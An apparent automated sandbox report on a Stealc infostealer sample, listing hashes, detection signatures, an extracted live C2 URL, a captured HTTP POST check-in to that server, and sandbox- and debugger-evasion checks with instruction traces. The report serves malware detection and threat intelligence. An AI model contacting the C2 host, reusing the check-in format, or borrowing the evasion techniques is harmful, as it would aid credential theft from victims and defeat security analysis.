Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532364
MD5: fb664593a62eba5ceb677e19aedc1673
SHA1: aee5527070492aa7d1e7c93a3a806ba0ef8fab8c
SHA256: 0d7cf91d5f474164b23946086b63538ccb1e4bf612e45e9556b2021574b26731
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB664593A62EBA5CEB677E19AEDC1673)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
YARA matches (Source | Rule | Description | Author):
  • dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
  • 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • Process Memory Space: file.exe PID: 7260 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: file.exe PID: 7260 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 0.2.file.exe.680000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
  • 2024-10-13T02:44:05.656962+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.680000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpL | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php8 | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpx | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php$ | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpP | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00687240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00698EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------DAFIEHIEGDHIDGDGHDHJ
    Content-Disposition: form-data; name="hwid"

    6FAF4175D9B61709341086
    ------DAFIEHIEGDHIDGDGHDHJ
    Content-Disposition: form-data; name="build"

    doma
    ------DAFIEHIEGDHIDGDGHDHJ--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00684880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/6122658-3693405117-2476756634-1002e
Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/Lxcq
Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/UxZq
Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/cx
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767079494.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpRx
Source: file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx
Source: file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37o

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A408E2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2F8D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097B017
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A041AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A473D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F131E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4C35C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4DCEF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959DF4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AFE3E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A48E64
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2367B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3EF59
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006845C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: miiyolpi ZLIB complexity 0.9950571145672333
Source: file.exe, 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00693720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HT44LF9U.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 54%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1812992 > 1048576
Source: file.exe | Static PE information: Raw size of miiyolpi is bigger than: 0x100000 < 0x194600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;miiyolpi:EW;gkepzjad:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;miiyolpi:EW;gkepzjad:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c06bb should be: 0x1c66e6
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: miiyolpi
Source: file.exe | Static PE information: section name: gkepzjad
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B408B7 push ebx; mov dword ptr [esp], ecx | 0_2_00B4097C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], 3506ED5Dh | 0_2_00A4A902
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], eax | 0_2_00A4A95F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push edx; mov dword ptr [esp], eax | 0_2_00A4A97F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push esi; mov dword ptr [esp], 003CA3FBh | 0_2_00A4A9FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push edx; mov dword ptr [esp], 7FF74867h | 0_2_00A4AB45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], eax | 0_2_00A4AB54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 21C10E3Ch; mov dword ptr [esp], ebx | 0_2_00A4AC1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push eax; mov dword ptr [esp], esi | 0_2_00A4ACCC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 279D721Bh; mov dword ptr [esp], eax | 0_2_00A4ACE4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ecx; mov dword ptr [esp], ebp | 0_2_00A4AD5B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ecx; mov dword ptr [esp], eax | 0_2_00A4AD85
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 4734A2C6h; mov dword ptr [esp], edi | 0_2_00A4AE22
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 4086EB83h; mov dword ptr [esp], ebx | 0_2_00A4AE56
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push eax; mov dword ptr [esp], ebp | 0_2_00A4AEB2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 14FA2791h; mov dword ptr [esp], ecx | 0_2_00A4AEBA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ecx; mov dword ptr [esp], 02D04A04h | 0_2_00A4AF2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push eax; mov dword ptr [esp], edi | 0_2_00A4AF72
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push eax; mov dword ptr [esp], esi | 0_2_00A4AF8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 6A138685h; mov dword ptr [esp], eax | 0_2_00A4AFA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push esi; mov dword ptr [esp], 6730ED42h | 0_2_00A4B01E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ebx; mov dword ptr [esp], edx | 0_2_00A4B041
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push eax; mov dword ptr [esp], edi | 0_2_00A4B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push edi; mov dword ptr [esp], esp | 0_2_00A4B05D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 08980700h; mov dword ptr [esp], eax | 0_2_00A4B0B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 7B206CA7h; mov dword ptr [esp], esp | 0_2_00A4B139
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 1FA9E2D8h; mov dword ptr [esp], ecx | 0_2_00A4B2A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push eax; mov dword ptr [esp], 5E33C0C0h | 0_2_00A4B2E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 3830FE77h; mov dword ptr [esp], eax | 0_2_00A4B314
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push 310DBC74h; mov dword ptr [esp], ecx | 0_2_00A4B33D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A8BB push ebp; mov dword ptr [esp], eax | 0_2_00A4B368
Source: file.exe | Static PE information: section name: miiyolpi entropy: 7.954024820130496

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13575)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A55168 second address: A5516E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5516E second address: A55173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A48963 second address: A48967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A48967 second address: A4896B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A4896B second address: A48971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5446E second address: A54476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A54476 second address: A5447A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5447A second address: A544C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66334h 0x00000007 jmp 00007F374CE66335h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push edi 0x00000010 pushad 0x00000011 jmp 00007F374CE6632Eh 0x00000016 jns 00007F374CE66326h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A544C0 second address: A544CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A54613 second address: A54617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A54617 second address: A5461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A577FB second address: A577FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A57830 second address: A57834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A57900 second address: A57905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A57905 second address: A5790B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5790B second address: A5790F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A57961 second address: A579D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F374C50007Ah 0x0000000e push 00000000h 0x00000010 jns 00007F374C500078h 0x00000016 push F19BD6DDh 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F374C500089h 0x00000024 popad 0x00000025 pop eax 0x00000026 add dword ptr [esp], 0E6429A3h 0x0000002d mov ecx, dword ptr [ebp+122D36B8h] 0x00000033 push 00000003h 0x00000035 mov edx, 56886F21h 0x0000003a push 00000000h 0x0000003c sub dword ptr [ebp+122D34E2h], ecx 0x00000042 push 00000003h 0x00000044 sbb dl, 00000041h 0x00000047 push B023C29Ah 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f js 00007F374C500076h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A57ABE second address: A57B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 call 00007F374CE6632Ah 0x0000000c pop edx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F374CE66328h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov edx, dword ptr [ebp+122D2805h] 0x0000002f mov edx, dword ptr [ebp+122D36D0h] 0x00000035 push 14918F0Ch 0x0000003a pushad 0x0000003b jno 00007F374CE6632Ch 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F282 second address: A4F28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74AE3 second address: A74AFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F374CE66337h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
